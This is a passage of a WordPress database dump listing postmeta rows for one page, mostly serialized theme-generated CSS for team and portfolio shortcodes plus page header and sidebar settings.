100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(15743,2876,'the7_shortcodes_dynamic_css','a:1:{s:32:\"f194fb3ae82043b7f3091632228c3686\";s:6838:\".dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media {\n  padding: 15px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media img {\n  max-width: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(15744,2876,'the7_shortcodes_dynamic_css','a:1:{s:32:\"f194fb3ae82043b7f3091632228c3686\";s:6838:\".dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media {\n  padding: 15px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media img {\n  max-width: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f194fb3ae82043b7f3091632228c3686.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(15745,2876,'_wp_page_template','default'),
(15746,2876,'_wpb_vc_js_status','true'),
(15747,2876,'_dt_sidebar_position','disabled'),
(15748,2876,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15749,2876,'_dt_sidebar_hide_on_mobile','0'),
(15750,2876,'_dt_footer_show','0'),
(15751,2876,'_dt_footer_widgetarea_id','sidebar_2'),
(15752,2876,'_dt_footer_hide_on_mobile','0'),
(15753,2876,'_dt_header_title','fancy'),
(15754,2876,'_dt_header_background','normal'),
(15755,2876,'_dt_header_background_below_slideshow','disabled'),
(15756,2876,'_dt_header_transparent_bg_color','#000000'),
(15757,2876,'_dt_header_transparent_bg_opacity','50'),
(15758,2876,'_dt_header_transparent_bg_color_scheme','light'),
(15759,2876,'_dt_header_disabled_background','normal'),
(15760,2876,'_dt_header_disabled_transparent_bg_color','#000000'),
(15761,2876,'_dt_header_disabled_transparent_bg_opacity','50'),
(15762,2876,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15763,2876,'_dt_header_transparent_top_bar_bg_color',''),
(15764,2876,'_dt_header_transparent_top_bar_bg_opacity','0'),
(15765,2876,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(15766,2876,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(15767,2876,'_dt_page_overrides_top_margin',''),
(15768,2876,'_dt_page_overrides_bottom_margin',''),
(15769,2876,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 20px;\r\n  right: 20px;\r\n  bottom: 20px;\r\n  left: 20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter 